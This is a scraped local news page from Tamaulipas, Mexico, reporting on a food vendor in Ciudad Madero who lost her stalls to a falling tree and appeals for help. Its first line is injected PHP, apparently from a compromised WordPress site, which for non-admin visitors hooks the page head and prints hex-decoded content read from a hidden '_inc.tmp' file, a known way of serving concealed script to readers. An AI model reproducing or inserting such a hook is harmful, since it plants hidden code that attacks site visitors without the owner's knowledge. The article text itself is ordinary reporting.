if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Comerciante afectada por caída de árbol solicita ayuda – Reporte Noreste
Conéctate con nosotros

Sur de Tamaulipas

Comerciante afectada por caída de árbol solicita ayuda

Comerciante afectada por caída de árbol solicita ayuda

Ciudad Madero, Tamaulipas.- Patricia Luque de León, comerciante dedicada a la venta de tacos, gorditas y mondongo los sábados, perdió todo con la caída del enorme árbol en la Plaza Galeana, ocurrido la noche del lunes, bastando sólo unos segundos para quedarse sin nada después de 35 años de trabajo en ese lugar.

Ella es propietaria de dos puestos dedicados a la venta de comida, dos pequeñas casetas que se ubican una a un costado del árbol sobre la acera de la plaza y la otra dentro de la plaza bajo las enormes ramas del orejón.

La señora Patricia refiere que ella trabaja en el lugar por más de 35 años y que ese ha sido y es el sustento de su familia.

“Ahí era mi vida, venía desde la mañana y me iba hasta la tarde, la pandemia ahí la pase y me da mucha tristeza haberme quedado sin nada”, refiere la señora al mirar los restos de sus puestos bajo las ramas.

Pide a la ciudadanía que la apoye y a las autoridades, si es posible, la reparación de sus puestos para que cuando se pueda, continuar trabajando en la venta de comida.

“Les pido de corazón si nos pueden ayudar, se los agradeceré lo que me quede de vida, a ver si el señor presidente nos puede ayudar para que me los arreglen o me regalen uno”, dijo entre sollozos la señora Patricia.

Inició carrera en medios en 1996. Ha participado como reportero en medios impresos y electrónicos conductor de noticias en radio y televisión.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Sur de Tamaulipas